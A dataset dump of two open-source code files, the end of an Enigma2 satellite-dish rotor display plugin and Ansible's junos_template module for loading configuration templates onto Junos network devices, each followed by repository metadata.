<widget name="turnTime" position="5,0" size="120,20" zPosition="1" font="Regular;20" halign="right" shadowColor="black" shadowOffset="-2,-2" transparent="1" />
<widget name="From" position="5,162" size="50,17" zPosition="1" font="Regular;17" halign="left" shadowColor="black" shadowOffset="-2,-1" transparent="1" />
<widget name="posFrom" position="57,160" size="70,20" zPosition="1" font="Regular;20" halign="left" shadowColor="black" shadowOffset="-2,-2" transparent="1" />
<widget name="Goto" position="5,182" size="50,17" zPosition="1" font="Regular;17" halign="left" shadowColor="black" shadowOffset="-2,-1" transparent="1" />
<widget name="posGoto" position="57,180" size="70,20" zPosition="1" font="Regular;20" halign="left" shadowColor="black" shadowOffset="-2,-2" transparent="1" />
<widget name="tunerName" position="5,144" size="90,16" zPosition="2" font="Regular;14" halign="left" shadowColor="black" shadowOffset="-2,-1" transparent="1" />
<widget name="turnSpeed" position="75,95" size="50,16" zPosition="2" font="Regular;14" halign="right" shadowColor="black" shadowOffset="-2,-1" transparent="1" />
<widget source="session.FrontendStatus" render="Progress" position="5,205" size="120,10" pixmap="skin_default/bar_snr.png" zPosition="2" borderWidth="2" borderColor="#cccccc">
<convert type="FrontendInfo">SNR</convert>
</widget>
</screen>"""
def __init__(self, session):
self.skin = Dish.skin
Screen.__init__(self, session)
self["Dishpixmap"] = Pixmap()
self["turnTime"] = Label("")
self["posFrom"] = Label("")
self["posGoto"] = Label("")
self["From"] = Label(_("From :"))
self["Goto"] = Label(_("Goto :"))
self["tunerName"] = Label("")
self["turnSpeed"] = Label("")
self.rotorTimer = eTimer()
self.rotorTimer.callback.append(self.updateRotorMovingState)
self.turnTimer = eTimer()
self.turnTimer.callback.append(self.turnTimerLoop)
self.timeoutTimer = eTimer()
self.timeoutTimer.callback.append(self.testIsTuned)
config.usage.showdish.addNotifier(self.configChanged)
self.configChanged(config.usage.showdish)
self.rotor_pos = self.cur_orbpos = config.misc.lastrotorposition.value
self.turn_time = self.total_time = self.pmt_timeout = self.close_timeout = None
self.cur_polar = 0
self.__state = self.STATE_HIDDEN
self.onShow.append(self.__onShow)
self.onHide.append(self.__onHide)
self.__event_tracker = ServiceEventTracker(screen=self,
eventmap= {
iPlayableService.evStart: self.__serviceStarted,
iPlayableService.evTunedIn: self.__serviceTunedIn,
})
def updateRotorMovingState(self):
moving = eDVBSatelliteEquipmentControl.getInstance().isRotorMoving()
if moving:
if self.cur_orbpos != INVALID_POSITION and self.cur_orbpos != config.misc.lastrotorposition.value:
config.misc.lastrotorposition.value = self.cur_orbpos
config.misc.lastrotorposition.save()
if self.__state == self.STATE_HIDDEN:
self.show()
def turnTimerLoop(self):
if self.total_time:
self.turn_time -= 1
self["turnTime"].setText(self.FormatTurnTime(self.turn_time))
self.close_timeout -=1
if self.close_timeout < 0:
print "[Dish] timeout!"
self.__toHide()
def __onShow(self):
self.__state = self.STATE_SHOWN
prev_rotor_pos = self.rotor_pos
self.rotor_pos = self.cur_orbpos
self.total_time = self.getTurnTime(prev_rotor_pos, self.rotor_pos, self.cur_polar)
self.turn_time = self.total_time
		self.close_timeout = round(self.total_time * 1.25) # added 25%
self["posFrom"].setText(self.OrbToStr(prev_rotor_pos))
self["posGoto"].setText(self.OrbToStr(self.rotor_pos))
self["tunerName"].setText(self.getTunerName())
if self.total_time == 0:
self["turnTime"].setText("")
self["turnSpeed"].setText("")
else:
self["turnTime"].setText(self.FormatTurnTime(self.turn_time))
self["turnSpeed"].setText(str(self.getTurningSpeed(self.cur_polar)) + chr(176) + _("/s"))
self.turnTimer.start(1000, False)
def __onHide(self):
self.__state = self.STATE_HIDDEN
self.turnTimer.stop()
def __serviceStarted(self):
if self.__state == self.STATE_SHOWN:
self.hide()
if not self.showdish:
return
service = self.session.nav.getCurrentService()
info = service and service.info()
data = info and info.getInfoObject(iServiceInformation.sTransponderData)
if not data or data == -1:
return
tuner_type = data.get("tuner_type")
if tuner_type and "DVB-S" in tuner_type:
self.cur_orbpos = data.get("orbital_position", INVALID_POSITION)
self.cur_polar = data.get("polarization", 0)
self.rotorTimer.start(500, False)
def __toHide(self):
self.rotorTimer.stop()
self.timeoutTimer.stop()
if self.__state == self.STATE_SHOWN:
self.hide()
def __serviceTunedIn(self):
self.pmt_timeout = self.close_timeout
self.timeoutTimer.start(500, False)
def testIsTuned(self):
if self.pmt_timeout >= 0:
service = self.session.nav.getCurrentService()
info = service and service.info()
pmt = info and info.getInfo(iServiceInformation.sPMTPID)
if pmt >= 0:
print "[Dish] tuned, closing..."
self.__toHide()
else:
self.pmt_timeout -= 0.5
else:
self.__toHide()
print "[Dish] tuning failed"
def dishState(self):
return self.__state
def configChanged(self, configElement):
self.showdish = configElement.value
def getTurnTime(self, start, end, pol=0):
mrt = abs(start - end) if start and end else 0
if mrt > 0:
if (mrt > 1800):
mrt = 3600 - mrt
if (mrt % 10):
mrt += 10
mrt = round((mrt * 1000 / self.getTurningSpeed(pol) ) / 10000) + 3
return mrt
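	# Worked example (added for clarity; rotor positions are in tenths of a
	# degree): moving from 130 (13.0E) to 282 (28.2E) gives mrt = 152, bumped
	# to 162 because it is not a multiple of 10; with the default 1.5 deg/s
	# horizontal speed this yields round((162 * 1000 / 1.5) / 10000) + 3 =
	# 11 + 3 = 14 seconds.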
def getTurningSpeed(self, pol=0):
tuner = self.getCurrentTuner()
if tuner is not None:
from Components.NimManager import nimmanager
nimConfig = nimmanager.getNimConfig(tuner)
if nimConfig.configMode.value == "simple":
if nimConfig.diseqcMode.value == "positioner":
nim = config.Nims[tuner]
if pol in (1, 3): # vertical
return nim.turningspeedV.float
return nim.turningspeedH.float
elif nimConfig.configMode.value == "advanced":
if self.cur_orbpos != INVALID_POSITION:
satlist = nimConfig.advanced.sat.keys()
if self.cur_orbpos in satlist:
currSat = nimConfig.advanced.sat[self.cur_orbpos]
lnbnum = int(currSat.lnb.value)
currLnb = lnbnum and nimConfig.advanced.lnb[lnbnum]
diseqcmode = currLnb and currLnb.diseqcMode.value or ""
if diseqcmode == "1_2":
if pol in (1, 3): # vertical
return currLnb.turningspeedV.float
return currLnb.turningspeedH.float
if pol in (1, 3):
return 1.0
return 1.5
def getCurrentTuner(self):
service = self.session.nav.getCurrentService()
feinfo = service and service.frontendInfo()
tuner = feinfo and feinfo.getFrontendData()
if tuner is not None:
return tuner.get("tuner_number")
return None
def getTunerName(self):
nr = self.getCurrentTuner()
if nr is not None:
from Components.NimManager import nimmanager
nims = nimmanager.nimList()
if nr < 4:
return "".join(nims[nr].split(':')[:1])
return " ".join((_("Tuner"),str(nr)))
return ""
def OrbToStr(self, orbpos):
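		# Orbital positions are stored in tenths of a degree east; values above
		# 180.0 degrees encode western positions as 3600 - position.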
if orbpos == INVALID_POSITION:
return "N/A"
if orbpos > 1800:
orbpos = 3600 - orbpos
return "%d.%d°W" % (orbpos/10, orbpos%10)
return "%d.%d°E" % (orbpos/10, orbpos%10)
def FormatTurnTime(self, time):
t = abs(time)
return "%s%02d:%02d" % (time < 0 and "- " or "", t/60%60, t%60)
| gpl-2.0 | -1,301,455,545,273,344,800 | 36.157895 | 178 | 0.694995 | false |
Jorge-Rodriguez/ansible-modules-core | network/junos/junos_template.py | 14 | 5097 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = """
---
module: junos_template
version_added: "2.1"
author: "Peter Sprygada (@privateip)"
short_description: Manage configuration on remote devices running Junos
description:
- The M(junos_template) module will load a candidate configuration
from a template file onto a remote device running Junos. The
module will return the differences in configuration if the diff
    option is specified on the Ansible command line.
extends_documentation_fragment: junos
options:
src:
description:
- The path to the config source. The source can be either a
file with config or a template that will be merged during
runtime. By default the task will search for the source
        file in the role or playbook root folder, in the templates directory.
required: true
default: null
backup:
description:
- When this argument is configured true, the module will backup
the configuration from the node prior to making any changes.
The backup file will be written to backup_{{ hostname }} in
the root of the playbook directory.
required: false
default: false
choices: ["true", "false"]
confirm:
description:
      - The C(confirm) argument will configure a timeout value for
        the commit to be confirmed before it is automatically
        rolled back. If the value for this argument is set to 0,
        the commit is confirmed immediately.
required: false
default: 0
comment:
description:
- The C(comment) argument specifies a text string to be used
when committing the configuration. If the C(confirm) argument
is set to False, this argument is silently ignored.
required: false
default: configured by junos_template
action:
description:
- The C(action) argument specifies how the module will apply changes.
required: false
default: merge
choices: ['merge', 'overwrite', 'replace']
version_added: "2.2"
config_format:
description:
      - The C(config_format) argument specifies the format of the configuration
        template specified in C(src). If this argument is not
        specified, the module will attempt to infer the configuration
        format based on the file extension. Files that end in I(xml) will set
        the format to xml. Files that end in I(set) will set the format
        to set; all other files will default the format to text.
required: false
default: null
choices: ['text', 'xml', 'set']
requirements:
- junos-eznc
notes:
- This module requires the netconf system service be enabled on
the remote device being managed
"""
EXAMPLES = """
- junos_template:
src: config.j2
comment: update system config

- name: replace config hierarchy
  junos_template:
    src: config.j2
    action: replace

- name: overwrite the config
  junos_template:
    src: config.j2
    action: overwrite
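
# A further illustrative task, not part of the original examples: it combines
# the documented backup, confirm and comment options. The confirm value is an
# arbitrary placeholder.
- name: load config with backup and a confirmed commit
  junos_template:
    src: config.j2
    backup: true
    confirm: 120
    comment: update system config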
"""
DEFAULT_COMMENT = 'configured by junos_template'

def main():
argument_spec = dict(
src=dict(required=True, type='path'),
confirm=dict(default=0, type='int'),
comment=dict(default=DEFAULT_COMMENT),
action=dict(default='merge', choices=['merge', 'overwrite', 'replace']),
config_format=dict(choices=['text', 'set', 'xml']),
backup=dict(default=False, type='bool'),
transport=dict(default='netconf', choices=['netconf'])
)
module = get_module(argument_spec=argument_spec,
supports_check_mode=True)
comment = module.params['comment']
confirm = module.params['confirm']
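    # In check mode the candidate configuration is still loaded and diffed
    # below, but the commit itself is suppressed.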
commit = not module.check_mode
action = module.params['action']
src = module.params['src']
fmt = module.params['config_format']
if action == 'overwrite' and fmt == 'set':
module.fail_json(msg="overwrite cannot be used when format is "
"set per junos documentation")
results = dict(changed=False)
results['_backup'] = str(module.get_config()).strip()
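    # Snapshot of the existing configuration; this is what gets written out
    # when the backup option is enabled.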
diff = module.load_config(src, action=action, comment=comment,
format=fmt, commit=commit, confirm=confirm)
if diff:
results['changed'] = True
results['diff'] = dict(prepared=diff)
module.exit_json(**results)

from ansible.module_utils.basic import *
from ansible.module_utils.junos import *

if __name__ == '__main__':
main()
| gpl-3.0 | -6,058,528,165,231,092,000 | 32.754967 | 80 | 0.683147 | false |